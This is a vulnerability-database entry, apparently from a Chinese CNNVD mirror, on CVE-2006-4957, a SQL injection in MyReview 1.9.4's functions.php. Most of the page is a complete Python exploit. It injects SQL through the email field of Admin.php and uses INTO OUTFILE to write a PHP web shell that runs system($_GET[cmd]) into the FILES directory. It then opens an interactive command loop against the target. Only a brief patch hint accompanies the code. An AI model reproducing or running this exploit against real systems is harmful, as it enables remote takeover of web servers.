MyReview 'functions.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111078 漏洞类型 SQL注入
发布时间 2006-09-19 更新时间 2006-09-25
CVE编号 CVE-2006-4957 CNNVD-ID CNNVD-200609-398
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2397
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-398
|漏洞详情
MyReview1.9.4的functions.php中GetMember函数内存在SQL注入漏洞,远程攻击者可以通过Admin.php的email参数执行任意SQL命令。
|漏洞EXP
# MyReview 1.9.4 SQL Injection exploit
#
#
# http://myreview.lri.fr/
#
# in functions.php starting from line 382
# ............	
#	function GetMember ($email, $db, $mode="array")
#	{
#  		$query = "SELECT * FROM PCMember WHERE email = '$email'" ;
#		result = $db->execRequete ($query);
# .......... 
# 
# $email is not checked before used into $query
# 
# for patch 
# 
# 1. add "$email=addslashes(trim($email));" before $query
# 2. use something else, very buggy script
#
# by STILPU (dmooray[a lu']gmail.com)
#


import httplib, urllib, re, urlparse, sys

def usage():
	print """
MyReview 1.9.4 SQL Injection exploit

Usage: python exploit.py http://target/pathtomyreview/

Requires warnings to be displayed so we cat get the localpath and FILES/ to be writable

by STILPU  (dmooray[a lu']gmail.com)

"""
	sys.exit(1)

def getlocalpath(server):
	params=urllib.urlencode({'email':'\'','motDePasse':'a','ident':'Log in'})
	headers={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}
	con = httplib.HTTPConnection(server)
	con.request("POST",path+"Admin.php",params,headers)
	resp=con.getresponse()
	data=resp.read()
	try:
		localpath=re.search('>/.*B',data[0:10000]).group().replace('>','',1).replace('B','',1)	
	except Exception: print "Exploit failed: didn`t manage to get localpath"; sys.exit(1)
	return localpath
	
def sendshell(server):
	shell="'<?php error_reporting(0); ini_set(\"max_execution_time\",0); system($_GET[cmd]); /*'"
	sql="' union select " + shell + ",0,0,0,'*/ ?>' into outfile '" +getlocalpath(server)+ "FILES/STILPU.php' from PCMember#"
	headers={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}
	params=urllib.urlencode({'email':sql,'motDePasse':'a','ident':'Log in'})
	con = httplib.HTTPConnection(server)
	con.request("POST",path+"Admin.php",params,headers)

def sendcmd(server):
	while 1:
		try:
			cmd=raw_input('sh$ ')
			cmd=cmd.replace(" ","+")
			con = httplib.HTTPConnection(target)
			con.request("GET",path+"FILES/STILPU.php?cmd="+cmd)
			resp=con.getresponse()
			data=resp.read()
			if (cmd=="exit" or cmd=="quit"): break
			print data
		except KeyboardInterrupt: break	


if __name__ == '__main__':

	if len(sys.argv) < 2:
		usage()		
	
	else:
		url = sys.argv[1]
		url = urlparse.urlsplit(url)
		target = url[1]
		path = url[2]
		
		sendshell(target)
		sendcmd(target)

# milw0rm.com [2006-09-19]
|参考资料

来源:XF
名称:myreview-functions-sql-injection(29029)
链接:http://xforce.iss.net/xforce/xfdb/29029
来源:BID
名称:20105
链接:http://www.securityfocus.com/bid/20105
来源:VUPEN
名称:ADV-2006-3716
链接:http://www.frsirt.com/english/advisories/2006/3716
来源:SECUNIA
名称:21991
链接:http://secunia.com/advisories/21991
来源:MILW0RM
名称:2397
链接:http://milw0rm.com/exploits/2397